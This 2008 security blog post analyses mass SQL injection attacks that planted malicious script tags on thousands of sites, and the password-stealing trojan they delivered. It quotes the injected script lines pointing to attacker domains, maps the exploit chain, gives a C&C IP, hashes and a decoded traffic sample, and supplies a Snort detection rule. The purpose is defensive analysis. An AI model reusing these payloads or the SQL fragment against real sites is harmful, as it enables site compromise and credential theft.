« January 2008 · July 2008 · March 2010 »

March 2008
MonTueWedThuFriSatSun
     0102
03040506070809
10111213141516
17181920212223
24252627282930
31      
April 2008
MonTueWedThuFriSatSun
 010203040506
07080910111213
14151617181920
21222324252627
282930    
May 2008
MonTueWedThuFriSatSun
   01020304
05060708091011
12131415161718
19202122232425
262728293031 

Calendar:

Newest first Oldest first

Thursday, 24 April 2008

Thousands of More Hacked Websites Targeting Your Passwords

Malicious SQL Injection Attacks Continue


Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

Last month we posted a blog entry summarizing attacks involving over 10,000 pages that had been injected with JavaScript that pointed back to a URL. Visitors to these sites would have a barrage of exploits fired at them as this malicious JavaScript link would attempt to load up several different pages. If an attack was successful the visitor would have a program running on their system that would steal passwords sent in POST request with Internet Explorer. Well, it looks like it is Deja Vu all over again.

In the past few weeks there have been several more different and successful SQL injection attacks against hundreds of websites and tens of thousands of web pages. In particular an attack involving the domain "nihaorr1.com" has been continuing spread over the last week or so. Another automated attack has been SQL injecting websites run ASP or ASP.NET and adding the following code to their pages: 

	"<script src=hxxp://www.nihaorr1.com/1.js></script>"

Presently there are over 38,000 search results on Google for the above URL and it has been growing over the past few days. There are also over 30,000 results for the domain "aspder.com" which was recently injected into thousands of pages as well. A very similar URL was used in these injections: 

	"<script src=hxxp://www.aspder.com/1.js></script>"

The website aspder.com has fortunately been down for a little bit now. However, the nihaorr1.com website is still currently up and serving malicious files.

The Malicious File Trail


Visiting a website with the above mentioned link to 1.js on nihaorr1.com results in the following chain of events:

hxxp://www.nihaorr1.com/1.js writes an iframe to hxxp://www.nihaorr1.com/1.htm

hxxp://www.nihaorr1.com/1.htm has same dangerous VBScript in it and may lead you to the following URLs by way of iframes:

hxxp://www.nihaorr1.com/Real.gif - Not an image - RealPlayer exploit
hxxp://www.nihaorr1.com/Yahoo.php - File Not Found (404)
hxxp://www.nihaorr1.com/cuteqq.htm - May try and load the following URLs by way of iframes or script references:

 -hxxp://www.nihaorr1.com/Ajax.htm - MDAC Exploit
 -hxxp://www.nihaorr1.com/Ms06014.htm - MDAC Exploit
 -hxxp://www.nihaorr1.com/Real.gif - RealPlayer Exploit
 -hxxp://www.nihaorr1.com/Bfyy.htm - Storm Player Exploit
 -hxxp://www.nihaorr1.com/Lz.htm - Ourgame GLWorld Exploit
 -hxxp://www.nihaorr1.com/Pps.htm - PowerPlayer Control Exploit
 -hxxp://www.nihaorr1.com/XunLei.htm - XunLei Thunder PPlayer Exploit


hxxp://www.nihaorr1.com/Ms07055.htm - File Not Found (404)
hxxp://www.nihaorr1.com/Ms07033.htm - File Not Found (404)
hxxp://www.nihaorr1.com/Ms07018.htm - iframe and javascript references:

 -hxxp://count34.51yes.com/click.aspx?id=345202594&logo=7 - Counter
 -hxxp://gg.haoliuliang.net/one/hao8.htm?036 - MDAC exploit and attempts to lead to the following files:

   -hxxp://gg.haoliuliang.net/wmwm/a014.js
   -hxxp://gg.haoliuliang.net/wmwm/arl.js
   -hxxp://gg.haoliuliang.net/wmwm/abf.js
   -hxxp://gg.haoliuliang.net/wmwm/alz.htm
   -hxxp://gg.haoliuliang.net/wmwm/anrl.htm
 Successful exploit attempts from one of the above five links results in a download of:
   -hxxp://mn.haoyuming.net/mmuu/abd.cab (saved as abd.exe)

hxxp://www.nihaorr1.com/Ms07004.htm - VML Exploit hxxp://www.nihaorr1.com/Ajax.htm - MDAC Exploit hxxp://www.nihaorr1.com/Ms06014.htm - MDAC Exploit

Successful exploit attempts coming from nihaorr1.com will result in the download of test.exe from the website. This is another password stealer like the one we found last time. We will talk about this more below.

Interesting Discovery


It turns out this server also houses a file called "123.rar" that is not referenced through any of these links. It's actually a file we discovered through Google's cache of the site, which apparently had an open index at one time. Inside this .rar file are all the files mentioned above that are presently hosted on nihaorr1.com. However, it appears that our nihaorr1.com website modified these files. Inside the copies of the files from the .rar are references to "www.nmidahena.com" instead of "nihaorr1.com".

The domain name "nmidahena.com" was also involved in SQL injections over the past month or so. The following familiar code was also injected into thousands of websites: 

	"<script src=hxxp://www.nmidahena.com/1.js></script>"

A Google query for "<script src=hxxp://www.nmidahena.com/1.js>" turns up over 90,000 results. This domain has since been killed off and looks like our attacker has moved on to some new ones.

Solving the Mystery of the SQL Injections


For some of the very similar and possibly directly related earlier attacks we had some details on what happened. The Internet Storm Center and the ModSecurity Website had some details on what the SQL injections looked like. However, it was not until a recent posting on the Internet Storm Center's site that we knew how they were being done in such mass and certainly automated fashion. In a posting titled "The 10.000 web sites infection mystery solved" they revealed the actual tool behind the attacks. At this point in time it's still not very clear how many people have been using the tool and have been behind the various attacks.

We are not going to post the exact SQL used in these attacks, although it's on the web right now. However, it does still involve the use of CAST statements and generally begins with a line that looks similar to this: "DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST". Not sure on the number of false positives that would occur, but it might be worth looking at an intrusion detection system (IDS) signature to look for things like this being sent to your web server.

The Malware


In the previous blog posting we mentioned that if a system was successfully exploited that they would have a password stealer on their system. It looks like these last set of attacks do the same thing. This time we have a little bit more information and have created a Snort rules that can be used to detect it. The malware itself only performs a few actions when run. Sandboxing it will show that it deletes the system's HOSTS file and that it drops a DLL file. It does NOT suddenly initiate any network traffic, at least not until Internet Explorer is used. It will not start sending data to the command and control (C&C) server until a POST request is made from the IE browser. Not only must a POST request be made, but it specifically looks for password fields (<input type="password"/>). If you are not using IE or POSTing a password field, it does not appear to ever communicate with the C&C.

If passwords are detecting being sent with IE, the trojan will immediately send the information to the C&C IP address 61.188.39.214 on port 2034. This traffic is encoded with a simple substitution cipher and is easily read.

Malware Binary:

File MD5: 4b913be127d648373e511974351ff04e
File Size: 24667 bytes

Malware DLL:

File MD5: 7c50f2ea53e22dd7a8ffa95f1441ec30
File Size: 45056 bytes

Sample output of all the traffic:

This traffic when decoded looks something like this (extraneous parts removed):

sid=wowshehaea&url=hxxp://url&pc=COMPUTERNAME;10.10.10.100;UKOS;M.4&other=text[username]username/password[password]abc123/Ds

Protection & Detection


As the first step, we highly recommend that you block access to the above domains (don't forget gg.haoliuliang.net). We have not been able to access them recently, but that does not mean they will not come back online. There will also certainly be new ones, so be on the look out for those as well. It is also highly recommend that you block access to 61.188.39.214 on your networks. Monitoring for dropped packets to this host would also be advised. However, this is of course just a cat and mouse game. IP address monitoring is usually only good for a short period of time.

Comparing traffic we were continually able to generate with that of traffic from the last trojan, we were also able to create what looks like will be a fairly reliable signature for the Snort IDS. This signature is now live on Emerging Threats.

alert tcp $HOME_NET 1024: -> $EXTERNAL_NET any (msg:"ET TROJAN Agent.kaq Chinese IE Password Stealer Encoded Traffic"; flow:to_server,established; content:"|20 20 20 20 20 00 03 00 06 00|"; depth:10; dsize:>100; reference:url,www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424; classtype:trojan-activity; sid:2008169; rev:2;)

We noticed that the first 10 bytes of the payload appear to always be the same and the packets are generally at least 100 bytes -- length varies based on the URL, computer name, IP address, and POSTed data. The rule could be modified to look for a destination port of 2034, but we've left this as "any" since this port could potentially change at any time.

Conclusion


It appears that mass SQL injections are something that we are going to continue to see for some time. At the moment it appears that a small set of people are behind these attacks. However, it most likely won't take too long for others to catch on and possibly conducting even more nefarious activities. If you your site has fallen victim to one of these attacks, it's not just important you remove the offending injections, but it's even more important you fix the SQL injection attack vector. If you do not, your website will continue to be vulnerable to similar or worse attacks.

=>Posted April 24, 2008, at 04:52 AM by Steven Adair